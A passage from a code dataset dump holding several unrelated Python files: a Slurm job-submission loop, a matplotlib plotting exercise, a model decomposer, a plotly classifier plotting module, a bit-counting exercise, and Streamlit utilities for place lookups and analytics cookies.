text=text.replace('_network',network)\n text=text.replace('_node',str(idx%6+1))\n text=text.replace('_name',_name)\n\n \n num=subprocess.Popen(\"squeue|grep jaehun|wc -l\", shell=True, stdout=subprocess.PIPE).stdout.read()\n num=int(num.decode(\"utf-8\")[:-1])\n while num>20:\n num=subprocess.Popen(\"squeue|grep jaehun|wc -l\", shell=True, stdout=subprocess.PIPE).stdout.read()\n num=int(num.decode(\"utf-8\")[:-1])\n time.sleep(5)\n with open('/home/jaehunryu/workspace/tvm/optimization_tvm/slurm_inference.sh', 'w') as f:\n f.write(text)\n time.sleep(17)\n proc = subprocess.Popen( sript , shell=True, executable='/bin/bash')\n proc.communicate()\n\n","sub_path":"optimization_tvm/test_inference.py","file_name":"test_inference.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"317396359","text":"#-------------------------------------------------------------------------------\n# Exemple de tracé explicite d'une fonction f(u)\n# Utilisation de la bibliothèque \"pylab\"\n#-------------------------------------------------------------------------------\n\n# Importation de pylab\nfrom pylab import *\n\nl=1000\na = 300\nb = 150\n\n# définition de la fonction (relation explicite) de la forme f(u)\ndef f(l,teta):\n return 2*l*sin(teta)\ndef Lambda(l,teta,a,b):\n return ((l-a-b)**2+4*b*(l-a)*(sin(teta))**2)**0.5\n\ndef course(Y,teta):\n tmin, tmax = 0,0\n for i in range(len(teta)-1):\n if (f(l,teta[i])<=200 and f(l,teta[i+1])>=200):\n tmin=teta[i]\n elif (f(l,teta[i])<=1700 and f(l,teta[i+1])>=1700):\n tmax=teta[i]\n print(int(Lambda(l,tmax,a,b)-Lambda(l,tmin,a,b)))\n\n# définition de la grille en X et calcul des valeurs de Y correspondantes\nX = linspace(-10, 10, 500)\nteta = linspace(0,pi/2,1000)\nY = f(l,teta)\nL = Lambda(l,teta,a,b)\n\n# tracé de la fonction\n\nplot(L,Y , color='blue',linewidth=2)\nlsp = linspace(550,775,1000)\nplot(lsp,len(lsp)*[200],'--')\nplot(lsp,len(lsp)*[1700],'--')\n\nlsp = linspace(200,1700,1000)\nplot(len(lsp)*[550],lsp,'--')\nplot(len(lsp)*[775], lsp, '--')\n\n# habillage\nxlabel('abscisses x')\nylabel('ordonnées y')\ntitle('y=f(x)')\nxticks(arange(500,850,50))\nyticks(arange(0, 2000 , 250))\ngrid()\n\n\n\nshow()\ncourse(L,teta)\n","sub_path":"PCSI/semestre 2/1-TP Matplotlib/Fichiers TP - Copie/explicite.py","file_name":"explicite.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"512908133","text":"\nimport networkx\n\nfrom les.mp_model import MPModel\nfrom les.decomposers import decomposer_base\nfrom les.graphs.decomposition_tree import DecompositionTree\nfrom les.utils import logging\n\ndef _get_indices(m, i):\n start = m.indptr[i]\n size = m.indptr[i + 1] - start\n result = []\n for j in xrange(start, start + size):\n result.append(m.indices[j])\n return result\n\n\nclass FinkelsteinAdvDecomposer(decomposer_base.DecomposerBase):\n '''\n :param model: A :class:`~les.mp_model.mp_model.MPModel` based model instance.\n '''\n\n def __init__(self, model):\n decomposer_base.DecomposerBase.__init__(self, model)\n self._u = []\n self._s = []\n self._m = []\n self._p = []\n self._used = []\n self._used2 = []\n self._layers =[]\n self._layermodel =[]\n\n def get_component(self,i):\n if self._p[i]!=i:\n self._p[i]=self.get_component(self._p[i])\n return self._p[i]\n\n def unite_components(self, i, j):\n\n i=self.get_component(i)\n j=self.get_component(j)\n self._p[i]=j\n\n def decompose(self, initial_cols=[0], max_separator_size=0,\n merge_empty_blocks=True):\n '''Decomposes model into submodels starting by initial cols. By default\n starts from column 0. Default max separator size is 11.\n\n :param initial_cols: A list of integers.\n :param max_separator_size: An integer that represents max available\n separator size.\n :param merge_empty_blocks: ``True`` or ``False``, whether or not we need to\n merge empty blocks.\n '''\n if max_separator_size:\n raise NotImplementedError()\n logging.info('Decompose model %s', self._model.get_name())\n\n self._used=[]\n self._used2=[]\n self._p=[]\n\n m = self._model.get_rows_coefficients()\n\n j_to_i_mapping = {}\n for j in range(m.shape[1]):\n j_to_i_mapping[j] = set()\n\n # TODO(d2rk): use interaction graph?\n g = networkx.Graph()\n g.add_nodes_from(range(m.shape[1]))\n for i in xrange(m.shape[0]):\n J_ = _get_indices(m, i)\n for j in range(len(J_) - 1):\n j_to_i_mapping[J_[j]].add(i)\n for j_ in range(j + 1, len(J_)):\n g.add_edge(J_[j], J_[j_])\n j_to_i_mapping[J_[-1]].add(i)\n\n def get_neighbors(nodes):\n neighbors = set()\n for node in nodes:\n neighbors.update(g.neighbors(node))\n neighbors.update(nodes)\n return neighbors\n \n def U(m_):\n u_=set()\n for i in xrange(m.shape[0]):\n ok = True\n K_ = _get_indices(m, i)\n for j in K_:\n ok &= j in m_\n if ok:\n u_.add(i)\n return u_\n\n self._m = [set(initial_cols) | get_neighbors(set(initial_cols))]\n self._s = [set()]\n self._u = [set()]\n\n i = len(self._m)\n J = get_neighbors(self._m[i - 1])\n while True:\n M_ = J - self._m[i - 1] - self._s[i - 1]\n if not len(M_):\n break\n T = get_neighbors(M_)\n J_ = T - M_\n self._m.append(M_)\n self._u.append(set())\n self._s.append(J_ & J)\n self._m[i - 1] -= self._s[i]\n J = T\n i += 1\n \n for j in range(i):\n current= self._m[j] | self._s[j]\n if j+1 < i:\n current.update(self._s[j+1])\n self._u[j] = U(current)\n \n tree = DecompositionTree(self._model)\n \n for j in range(m.shape[1]):\n self._p.append(j)\n self._used.append(0)\n self._used2.append(0)\n \n self._layers=[]\n self._layermodel=[]\n for j in range(i):\n self._layers.append([])\n self._layermodel.append([])\n for j in range(i-1,-1,-1):\n current=self._m[j] | self._s[j]\n separator=set() | self._s[j]\n if j+10:\n tree.add_edge(self._layermodel[j][-1], self._layermodel[j+1][_k],\n [self.get_model().get_columns_names()[i] for i in self._layers[j][-1] & self._layers[j+1][_k]])\n for k in separator:\n T=get_neighbors([k])\n for _k in T:\n if self._used[_k]:\n self.unite_components(k,_k)\n tree.set_root(self._layermodel[0][0])\n \n\n self._decomposition_tree = tree\n","sub_path":"src/main/python/les/decomposers/finkelstein_adv_decomposer.py","file_name":"finkelstein_adv_decomposer.py","file_ext":"py","file_size_in_byte":4871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"24663035","text":"\nimport numpy as np\nfrom sklearn.metrics import confusion_matrix, roc_curve, auc\n\n\nimport plotly.graph_objs as go\nimport plotly.figure_factory as ff\nfrom plotly.offline import iplot\n\nfrom palantiri.BasePlotHandlers import PlotHandler\n\n\nclass ClassifierPlotHandler(PlotHandler):\n \"\"\" Handles all the plots related of the chosen classifier. \"\"\"\n\n def __init__(self, dataset, trained_classifier, **params):\n \"\"\"\n Initialization function\n :param dataset: the dataset in a dict format with the following keys:\n 'data' - numpy array with all the data points.\n 'target' - the label of the corresponding data point.\n 'target_names' - the label name.\n\n :param trained_classifier: sklearn classifier (trained / fitted).\n In order to plot the ROC plot - the classifier should have the predict_proba ability.\n :param params: other params\n \"\"\"\n\n self._dataset = dataset\n self._trained_classifier = trained_classifier\n\n self._n_classes = len(set(dataset['target']))\n\n if hasattr(self._dataset, 'target_names'):\n self.class_names = self._dataset['target_names']\n else:\n self.class_names = ['Class {0}'.format(i) for i in range(self.n_classes)]\n\n # Score of the predicted target store.\n if hasattr(self._trained_classifier, 'predict_proba'):\n self._predicted_target_score = self._trained_classifier.predict_proba(self._dataset['data'])\n else:\n self._predicted_target_score = None\n\n self._confusion_matrix = None\n self.confusion_matrix_colorscale = 'Viridis'\n\n self.prediction_figure = None\n self.roc_figure = None\n self.confusion_matrix_figure = None\n\n super(ClassifierPlotHandler, self).__init__(**params)\n\n @classmethod\n def from_pandas_dataframe(cls, dataframe, trained_classifier, **params):\n \"\"\"\n Constructing the handler from a pandas dataframe.\n :param dataframe: the dataframe form which the handler is constructed.\n The 'target' column should be included in the dataframe.\n :param trained_classifier: sklearn classifier (trained / fitted).\n :param params: other params.\n :return: returns the classifier plot handler object.\n \"\"\"\n\n assert 'target' in dataframe.columns.values, 'target values not in dataframe'\n\n dataset = dict()\n dataset['data'] = dataframe.drop('target', axis=1).values\n dataset['target'] = dataframe['target'].values\n dataset['feature_names'] = dataframe.drop('target', axis=1).columns.values\n return cls(dataset, trained_classifier, **params)\n\n @property\n def trained_classifier(self):\n \"\"\"\n The trained classifier .\n :return: The classifier in the sklearn format.\n \"\"\"\n return self._trained_classifier\n\n @property\n def dataset(self):\n \"\"\"\n The dataset\n :return: The dataset as a dictionary\n \"\"\"\n return self._dataset\n\n @dataset.setter\n def dataset(self, dataset):\n \"\"\"\n The dataset setter.\n :param dataset: the new dataset\n \"\"\"\n self._dataset = dataset\n\n @property\n def predicted_target_score(self):\n \"\"\"\n The predicted score - available if classifier has the predict_proba functionality.\n :return: The predicted score.\n \"\"\"\n return self._predicted_target_score\n\n @property\n def confusion_matrix(self):\n \"\"\"\n The confusion matrix.\n :return: The confusion matrix as a numpy array.\n \"\"\"\n return self._confusion_matrix\n\n @property\n def n_classes(self):\n \"\"\"\n The number of classes.\n :return: An int representing the number of classes.\n \"\"\"\n return self._n_classes\n\n def build_confusion_matrix(self, normalize=False):\n \"\"\"\n Building the confusion matrix\n :param normalize: if True confusion matrix is normalized.\n \"\"\"\n\n prediction = self.trained_classifier.predict(self._dataset['data'])\n\n self._confusion_matrix = confusion_matrix(self._dataset['target'], prediction)\n\n if normalize:\n self._confusion_matrix = \\\n self._confusion_matrix.astype('float') / self._confusion_matrix.sum(axis=1)[:, np.newaxis]\n else:\n self._confusion_matrix = self._confusion_matrix\n\n def build_confusion_matrix_figure(self, figure_layout):\n \"\"\"\n Builds the confusion matrix figure in confusion_matrix_figure.\n :param figure_layout: figure layout - plot.ly layout object.\n \"\"\"\n\n if not self._confusion_matrix:\n self.build_confusion_matrix()\n\n cm = np.flipud(self._confusion_matrix)\n x = list(self.class_names)\n y = list(reversed(self.class_names))\n\n self.confusion_matrix_figure = ff.create_annotated_heatmap(z=cm, x=x, y=y,\n colorscale=self.confusion_matrix_colorscale)\n\n self.confusion_matrix_figure['layout'].update(figure_layout)\n\n def plot_confusion_matrix(self, figure_layout=None):\n \"\"\"\n Plotting the confusion matrix figure with plot.ly's iplot function.\n :param figure_layout: figure layout - plot.ly layout object.\n \"\"\"\n\n if not figure_layout:\n figure_layout = go.Layout(\n xaxis={'title': 'Confusion Matrix

Predicted Value'},\n yaxis={'title': 'True Value'})\n\n if not self.confusion_matrix_figure:\n self.build_confusion_matrix_figure(figure_layout)\n else:\n self.confusion_matrix_figure['layout'].update(figure_layout)\n\n iplot(self.confusion_matrix_figure)\n\n def build_roc_figure(self, figure_layout=go.Layout()):\n \"\"\"\n Building the ROC curve figure of the classifier.\n :param figure_layout: figure layout - plot.ly layout object.\n \"\"\"\n\n data = list()\n\n if self.n_classes < 3:\n # False positive rate and true positive rate - computed from roc_curve()\n fpr, tpr, _ = roc_curve(self.dataset['target'], self.predicted_target_score[:, 1])\n\n # Area under curve.\n roc_auc = auc(fpr, tpr)\n\n # Updating the data list.\n data.append(go.Scatter(x=fpr,\n y=tpr,\n hoverinfo='y',\n mode='lines',\n line=dict(color='darkorange'),\n name='ROC curve (area = %0.2f)' % roc_auc))\n else:\n\n # False Positive, True Positive rates and Area Under Curve values for each class.\n fpr = dict()\n tpr = dict()\n roc_auc = dict()\n\n for i in range(self.n_classes):\n fpr[i], tpr[i], _ = roc_curve((self.dataset['target'] == i).astype(float),\n self.predicted_target_score[:, i])\n roc_auc[i] = auc(fpr[i], tpr[i])\n\n data.append(go.Scatter(x=fpr[i],\n y=tpr[i],\n hoverinfo='y',\n mode='lines',\n name='ROC curve of class {0} (area = {1:0.2f})'''.format(\n self.class_names[i], roc_auc[i])))\n\n # Diagonal\n data.append(go.Scatter(x=[0, 1], y=[0, 1],\n mode='lines',\n hoverinfo='skip',\n line=dict(color='navy', dash='dash'),\n showlegend=False))\n\n self.roc_figure = go.Figure(data=data, layout=figure_layout)\n\n def plot_roc(self, figure_layout=None):\n \"\"\"\n Plotting the ROC curve figure with plot.ly's iplot function.\n :param figure_layout: figure layout - plot.ly Layout object.\n \"\"\"\n\n if not figure_layout:\n figure_layout = go.Layout(title=dict(text='ROC Curve', x=0.5),\n xaxis=dict(title='False Positive Rate'),\n yaxis=dict(title='True Positive Rate'))\n\n if not self.roc_figure:\n self.build_roc_figure(figure_layout=figure_layout)\n else:\n self.roc_figure['layout'].update(figure_layout)\n\n iplot(self.roc_figure)\n\n def build_prediction_figure(self, figure_layout):\n \"\"\"\n Building the classifier prediction figure.\n :param figure_layout: figure layout - plot.ly Layout object.\n \"\"\"\n\n pass\n\n def plot_prediction(self, figure_layout=None):\n \"\"\"\n Plotting the prediction figure with plot.ly's iplot function.\n :param figure_layout: figure layout - plot.ly Layout object.\n \"\"\"\n\n if not figure_layout:\n figure_layout = go.Layout(title=dict(text='Classifier Prediction', x=0.5))\n\n if not self.prediction_figure:\n self.build_prediction_figure(figure_layout=figure_layout)\n else:\n self.prediction_figure['layout'].update(figure_layout)\n\n iplot(self.prediction_figure)\n\n def save_prediction_figure(self, file_name):\n \"\"\"\n Saving the prediction figure as an html file.\n :param file_name: the html file name.\n \"\"\"\n\n self.save_figure(self.prediction_figure, file_name)\n\n def save_roc_figure(self, file_name):\n \"\"\"\n Saving the ROC curve figure as an html file.\n :param file_name: the html file name.\n \"\"\"\n\n self.save_figure(self.roc_figure, file_name)\n\n def save_confusion_matrix_figure(self, file_name):\n \"\"\"\n Saving the confusion matrix figure as an html file.\n :param file_name: the html file name.\n \"\"\"\n\n self.save_figure(self.confusion_matrix_figure, file_name)\n\n\nclass TwoDimensionalClassifierPlotHandler(ClassifierPlotHandler):\n \"\"\" Handles all the plots related of the chosen classifier on 2D. \"\"\"\n\n def __init__(self, dataset, trained_classifier, **params):\n \"\"\"\n The initialization function of the 2D classifier plot handler.\n :param dataframe: the dataframe form which the handler is constructed.\n :param trained_classifier: sklearn classifier (trained / fitted).\n :param params: other params.\n \"\"\"\n\n dataset['data'] = dataset['data'][:, :2]\n\n super(TwoDimensionalClassifierPlotHandler, self).__init__(dataset, trained_classifier, **params)\n\n def build_prediction_figure(self, figure_layout=go.Layout(), step_size=0.01):\n \"\"\"\n Building the classifier prediction figure.\n :param figure_layout: figure layout - plot.ly Layout object.\n :param step_size: Plot resolution.\n \"\"\"\n\n data = list()\n\n x_min, x_max = self.dataset['data'][:, 0].min() - 1, self.dataset['data'][:, 0].max() + 1\n y_min, y_max = self.dataset['data'][:, 1].min() - 1, self.dataset['data'][:, 1].max() + 1\n\n x = np.arange(x_min, x_max, step_size)\n y = np.arange(y_min, y_max, step_size)\n x_mesh, y_mesh = np.meshgrid(x, y)\n\n z = self.trained_classifier.predict(np.column_stack((x_mesh.ravel(), y_mesh.ravel())))\n\n z = z.reshape(x_mesh.shape)\n\n data.append(go.Contour(x=x, y=y, z=z,\n showscale=False,\n hoverinfo='skip',\n colorscale='Viridis'))\n\n data.append(go.Scatter(x=self.dataset['data'][:, 0],\n y=self.dataset['data'][:, 1],\n text=[self.class_names[i] for i in self.dataset['target']],\n hoverinfo='text',\n mode='markers',\n marker=dict(color=self.dataset['target'],\n showscale=False,\n colorscale='Reds',\n line=dict(color='black', width=1))))\n\n if 'feature_names' in self.dataset.keys():\n figure_layout['xaxis'].update({'title': self.dataset['feature_names'][0]})\n figure_layout['yaxis'].update({'title': self.dataset['feature_names'][1]})\n\n self.prediction_figure = go.Figure(data=data, layout=figure_layout)\n\n\nclass ThreeDimensionalClassifierPlotHandler(ClassifierPlotHandler):\n \"\"\" Handles all the plots related of the chosen classifier on 3D. \"\"\"\n\n def __init__(self, dataset, trained_classifier, **params):\n \"\"\"\n The initialization function of the 3D classifier plot handler.\n :param dataframe: the dataframe form which the handler is constructed.\n :param trained_classifier: sklearn classifier (trained / fitted).\n :param params: other params.\n \"\"\"\n\n dataset['data'] = dataset['data'][:, :3]\n\n super(ThreeDimensionalClassifierPlotHandler, self).__init__(dataset, trained_classifier, **params)\n\n def build_prediction_figure(self, figure_layout=go.Layout()):\n \"\"\"\n Plotting the classifier prediction and saving the figure.\n :param figure_layout: figure layout - plot.ly Layout object.\n \"\"\"\n\n labels = self.trained_classifier.predict(self.dataset['data'])\n\n data = list()\n\n for label in set(labels):\n\n data_points = self.dataset['data'][np.in1d(labels, np.asarray(label))]\n\n data.append(go.Scatter3d(x=data_points[:, 0],\n y=data_points[:, 1],\n z=data_points[:, 2],\n text=self.class_names[label],\n hoverinfo='text',\n showlegend=True,\n name=self.class_names[label],\n mode='markers',\n marker=dict(\n line=dict(color='black', width=1))))\n\n if 'feature_names' in self.dataset.keys():\n figure_layout['scene'].update(\n dict(xaxis={'title': self.dataset['feature_names'][0]},\n yaxis={'title': self.dataset['feature_names'][1]},\n zaxis={'title': self.dataset['feature_names'][2]}))\n\n self.prediction_figure = go.Figure(data=data, layout=figure_layout)\n","sub_path":"palantiri/ClassificationPlotHandlers.py","file_name":"ClassificationPlotHandlers.py","file_ext":"py","file_size_in_byte":14676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"13884680","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n__author__ = 'MFC'\n__time__ = '2020/6/14 21:28'\n\n\n\"\"\"\nHJ15 -- 求int型数据在内存中存储时1的个数\n\nhttps://www.nowcoder.com/practice/440f16e490a0404786865e99c6ad91c9?tpId=37&&tqId=21238&rp=1&ru=/activity/oj&qru=/ta/huawei/question-ranking\n\n题目描述\n输入一个int型的正整数,计算出该int型数据在内存中存储时1的个数。\n\n输入描述:\n 输入一个整数(int类型)\n\n输出描述:\n 这个数转换成2进制后,输出1的个数\n\"\"\"\n# 5 -> 2\nprint(bin(int(input())).count('1'))\n\n# 如果是计算0的个数,需要另行处理,因为bin把数字转为二进制后在二进制的前面会有0b,如数字8:0b1000,所以计算0需要减去1\n","sub_path":"niuke_huawei/HJ15.py","file_name":"HJ15.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"469328294","text":"import streamlit as st\nfrom streamlit.server.Server import Server\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom typing import List, Dict\nimport session\nfrom models import (\n SimulatorOutput,\n ContainmentStrategy,\n ResourceAvailability,\n BackgroundColor,\n Logo,\n Link,\n Indicator,\n AlertBackground,\n IndicatorBackground,\n Illustration,\n Product,\n Dimension,\n)\nfrom typing import List\nimport re\nimport numpy as np\nimport math\nimport pandas as pd\nimport os\n\nimport collections\nimport functools\nimport inspect\nimport textwrap\nimport yaml\nimport random\nfrom ua_parser import user_agent_parser\nimport time\nimport loader\n\nconfigs_path = os.path.join(os.path.dirname(__file__), \"configs\")\ncities = pd.read_csv(os.path.join(configs_path, \"cities_table.csv\"))\nstates = pd.read_csv(os.path.join(configs_path, \"states_table.csv\"))\n\n# DATASOURCE TOOLS\n\ndef get_inloco_url(config):\n\n api_inloco = dict()\n\n if os.getenv(\"IS_LOCAL\") == \"TRUE\":\n api_url = config[\"br\"][\"api\"][\"local\"]\n else:\n api_url = config[\"br\"][\"api\"][\"external\"]\n\n if os.getenv(\"INLOCO_CITIES_ROUTE\") and os.getenv(\"INLOCO_STATES_ROUTE\"):\n api_inloco[\"cities\"] = api_url + os.getenv(\"INLOCO_CITIES_ROUTE\")\n api_inloco[\"states\"] = api_url + os.getenv(\"INLOCO_STATES_ROUTE\")\n\n else:\n raise ValueError(\"Inloco routes not found in env vars!\")\n\n return api_inloco\n\n\n# DATES TOOLS\n\ndef fix_dates(df):\n for col in df.columns:\n if \"last_updated\" in col:\n df[col] = pd.to_datetime(\n df[col]\n ) # .apply(lambda x: x.strftime(\"%d/%m/%Y\"))\n return df\n\n\ndef convert_times_to_real(row):\n today = datetime.now()\n return today + timedelta(row[\"ddias\"])\n\n\n# TODO: melhorar essa funcao\ndef get_sources(user_input, data, cities_sources, resources):\n\n cols_agg = {\n \"number\": lambda x: x.sum() if np.isnan(x.sum()) == False else 0,\n \"last_updated_number\": lambda x: pd.to_datetime(x).max(),\n \"author_number\": lambda x: x.drop_duplicates().str.cat(),\n }\n\n for x in resources:\n\n for item in cols_agg.keys():\n\n col = \"_\".join([item, x])\n\n if (\n user_input[\"place_type\"] == \"state_num_id\"\n or user_input[\"place_type\"] == \"health_region_id\"\n ):\n\n user_input[col] = cities_sources[\n cities_sources[user_input[\"place_type\"]]\n == data[user_input[\"place_type\"]].iloc[0]\n ][col].agg(cols_agg[item])\n\n if user_input[\"place_type\"] == \"city_id\":\n user_input[col] = data[col].fillna(0).values[0]\n\n user_input[\"last_updated_number_beds\"] = pd.to_datetime(\n user_input[\"last_updated_number_beds\"]\n ).strftime(\"%d/%m\")\n\n user_input[\"last_updated_number_icu_beds\"] = pd.to_datetime(\n user_input[\"last_updated_number_icu_beds\"]\n ).strftime(\"%d/%m\")\n\n return user_input\n\n\n# PLACES TOOLS\n\ndef add_all(x, all_string=\"Todos\", first=None):\n formatted = [all_string] + list(x)\n if first != None:\n first_index = formatted.index(first)\n item = formatted.pop(first_index)\n formatted.insert(0, item)\n return formatted\n\n\ndef filter_place(\n dfs, place_type, state_name=None, health_region_name=None, city_name=None\n):\n\n if place_type == \"state\":\n return dfs[\"city\"][\"state_name\"].sort_values().unique()\n elif place_type == \"city\":\n data = dfs[\"city\"][dfs[\"city\"][\"state_name\"] == state_name]\n if health_region_name != None and health_region_name != \"Todos\":\n data = data.loc[data[\"health_region_name\"] == health_region_name]\n return add_all(data[\"city_name\"].sort_values().unique())\n else:\n data = dfs[\"city\"][dfs[\"city\"][\"state_name\"] == state_name]\n return add_all(data[\"health_region_name\"].sort_values().unique())\n\n\ndef choose_place(city, region, state):\n if city == \"Todos\" and region == \"Todos\":\n return state + \" (Estado)\"\n if city == \"Todos\":\n return region + \" (Região de Saúde)\"\n return city\n\n\nclass Dictionary:\n def __init__(self):\n self.dictionary = None\n\n def check_initialize(self):\n if self.dictionary is None:\n self.dictionary = loader.read_data(\n \"br\",\n loader.config,\n loader.config[\"br\"][\"api\"][\"endpoints\"][\"utilities\"][\"place_ids\"],\n )\n\n def get_place_names_by_id(self, id):\n self.check_initialize()\n if id < 100: # is state\n return [\n self.dictionary.loc[self.dictionary[\"state_num_id\"] == id][\n \"state_name\"\n ].values[0]\n ]\n elif id < 10000: # is health regional\n row = self.dictionary.loc[self.dictionary[\"health_region_id\"] == id]\n # healh regional,stater\n return [\n row[\"health_region_name\"].values[0],\n row[\"state_name\"].values[0],\n ]\n else: # is city\n row = self.dictionary.loc[self.dictionary[\"city_id\"] == id]\n # city,healh regional,state\n return [\n row[\"city_name\"].values[0],\n row[\"health_region_name\"].values[0],\n row[\"state_name\"].values[0],\n ]\n\n def get_place_id_by_names(\n self, state_name, city_name=\"Todos\", health_region_name=None\n ):\n self.check_initialize()\n dictionary = self.dictionary.loc[self.dictionary[\"state_name\"] == state_name]\n if health_region_name != None:\n return dictionary.loc[\n dictionary[\"health_system_region\"] == health_region_name\n ][\"health_region_id\"].values[0]\n elif city_name != \"Todos\":\n return dictionary.loc[dictionary[\"city_name\"] == city_name][\n \"city_id\"\n ].values[0]\n else:\n dictionary[\"state_num_id\"].values[0]\n\n def get_state_alphabetical_id_by_name(self, state_name):\n self.check_initialize()\n if state_name == \"Todos\":\n return \"BR\"\n return self.dictionary.loc[self.dictionary[\"state_name\"] == state_name][\n \"state_id\"\n ].values[0]\n\n# def get_state_str_id_by_id(place_id):\n\n# states = pd.read_csv(\n# os.path.join(\n# os.path.join(os.path.dirname(__file__), \"configs\"), \"states_table.csv\"\n# )\n# )\n\n# index = [i for i in states.columns].index(\"state_id\")\n# return states.query(\"state_num_id == '%s'\" % place_id).values[0][index]\n\n\ndef get_ufs_list():\n\n return [\n \"AC\",\n \"AL\",\n \"AM\",\n \"AP\",\n \"BA\",\n \"CE\",\n \"DF\",\n \"ES\",\n \"GO\",\n \"MA\",\n \"MG\",\n \"MS\",\n \"MT\",\n \"PA\",\n \"PB\",\n \"PE\",\n \"PI\",\n \"PR\",\n \"RJ\",\n \"RN\",\n \"RO\",\n \"RR\",\n \"RS\",\n \"SC\",\n \"SE\",\n \"SP\",\n \"TO\",\n ]\n\n\n# FRONT-END TOOLS\n# AMPLITUDE ANALYTICS HELPER METHODS\n# PLUS SOME EXTRA STREAMLIT HACKING\n# Kept for backwards compatibility reasons\ndef get_server_session():\n return session._get_session_raw()\n\n\ndef manage_user_existence(user_session, session_state):\n \"\"\" \n Decides if the user is new or not and if it is new generates a random id \n Will not try to do it twice because we can have the case of the user refusing to hold our cookies\n therefore we will consider him the anonymous user and give up trying to give him our cookie.\n \"\"\"\n user_data = parse_headers(user_session.ws.request)\n if session_state.already_generated_user_id is None:\n session_state.already_generated_user_id = False\n\n if user_data[\"cookies_initialized\"] is False:\n # Sometimes the browser doesn't load up upfront so we need this\n reload_window()\n time.sleep(1)\n else:\n if (\n \"user_unique_id\" not in user_data[\"Cookie\"].keys()\n and session_state.already_generated_user_id is False\n ):\n hash_id = gen_hash_code(size=32)\n session_state.already_generated_user_id = True\n update_user_public_info()\n time.sleep(0.1)\n give_cookies(\"user_unique_id\", hash_id, 99999, True)\n\n\ndef gen_hash_code(size=16):\n return \"\".join(\n random.choice(\"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuv\")\n for i in range(size)\n )\n\n\ndef parse_headers(request):\n \"\"\" Takes a raw streamlit request header and converts it to a nicer dictionary \"\"\"\n data = dict(request.headers.items())\n ip = request.remote_ip\n if \"Cookie\" in data.keys():\n data[\"Cookie\"] = dict([i.split(\"=\") for i in data[\"Cookie\"].split(\"; \")])\n data[\"cookies_initialized\"] = True\n else:\n data[\"Cookie\"] = dict()\n data[\"cookies_initialized\"] = False\n if \"user_public_data\" in data[\"Cookie\"].keys():\n data[\"Cookie\"][\"user_public_data\"] = dict(\n [i.split(\"|:\") for i in data[\"Cookie\"][\"user_public_data\"].split(\"|%\")]\n )\n data[\"Remote_ip\"] = ip\n data.update(parse_user_agent(data[\"User-Agent\"]))\n return data\n\n\ndef parse_user_agent(ua_string):\n in_data = user_agent_parser.Parse(ua_string)\n out_data = dict()\n data_reference = [\n [\"os_name\", [\"os\", \"family\"]],\n [\"os_version\", [\"os\", \"major\"]],\n [\"device_manufacturer\", [\"device\", \"brand\"]],\n [\"device_model\", [\"device\", \"model\"]],\n [\"platform\", [\"user_agent\", \"family\"]],\n [\"app_version\", [\"user_agent\", \"major\"]],\n ]\n for key_in, keys_out in data_reference:\n try:\n out_data[\"ua_\" + key_in] = in_data[keys_out[0]][keys_out[1]]\n except:\n out_data[\"ua_\" + key_in] = None\n return out_data\n\n\ndef give_cookies(cookie_name, cookie_info, cookie_days=99999, rerun=False):\n \"\"\" Gives the user a browser cookie \"\"\"\n # Cookie days is how long in days will the cookie last\n st.write(\n f\"\"\"\"\"\",\n unsafe_allow_html=True,\n )\n if rerun:\n time.sleep(1)\n reload_window()\n # session.rerun()\n\n\ndef update_user_public_info():\n \"\"\" updates the user's public data for us like his ip address and geographical location \"\"\"\n st.write(\n f\"\"\"\n \"\"\",\n unsafe_allow_html=True,\n )\n\n\ndef reload_window():\n \"\"\" Reloads the user's entire browser window \"\"\"\n st.write(\n f\"\"\"\n \"\"\",\n unsafe_allow_html=True,\n )\n time.sleep(1)\n\n\n# END OF AMPLITUDE HELPER METHODS\n\n# JAVASCRIPT HACK METHODS\n\ndef stylizeButton(name, style_string, session_state, others=dict()):\n \"\"\" adds a css option to a button you made \"\"\"\n session_state.button_styles[name] = [style_string, others]\n\n\ndef applyButtonStyles(session_state):\n \"\"\" Use it at the end of the program to apply styles to buttons as defined by the function above \"\"\"\n time.sleep(0.1)\n html = \"\"\n for name, style in session_state.button_styles.items():\n parts = (\n style[0]\n .replace(\"\\n\", \"\")\n .replace(\" \", \"\")\n .replace(\"; \", \"&\")\n .replace(\";\", \"&\")\n .replace(\":\", \"=\")\n )\n other_args = \"&\".join(\n [str(key) + \"=\" + str(value) for key, value in style[1].items()]\n )\n html += f\"\"\"\n \"\"\"\n st.write(html, unsafe_allow_html=True)\n\n\ndef get_radio_horizontalization_html(radio_label):\n \"\"\" Takes a normal radio and restilizes it to make it horizontal and bigger\"\"\"\n html = f\"\"\"\"\"\"\n return html\n\n\ndef hide_iframes():\n st.write(\n f\"\"\"\"\"\",\n unsafe_allow_html=True,\n )\n\n\n# END OF JAVASCRIPT HACK METHODS\n\ndef gen_pdf_report():\n st.write(\n \"\"\"\n \n \"\"\",\n unsafe_allow_html=True,\n )\n\n\ndef make_clickable(text, link):\n # target _blank to open new window\n # extract clickable text to display for your link\n return f'{text}'\n\n\ndef localCSS(file_name):\n with open(file_name) as f:\n st.markdown(f\"\", unsafe_allow_html=True)\n\n\ndef gen_whatsapp_button(info) -> None:\n \"\"\"Generate WPP button\n\n Args:\n info: config[\"contact\"]\n \"\"\"\n url = \"whatsapp://send?text={}&phone=${}\".format(info[\"msg\"], info[\"phone\"])\n st.write(\n \"\"\" \n \n ?\n

Dúvidas?

\n \"\"\"\n % url,\n unsafe_allow_html=True,\n )\n\n\ndef gen_info_modal():\n return f\"\"\"\n Entenda a classificação dos níveis\n
\n
\n ×\n
\n

Valores de referência

\n
\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n
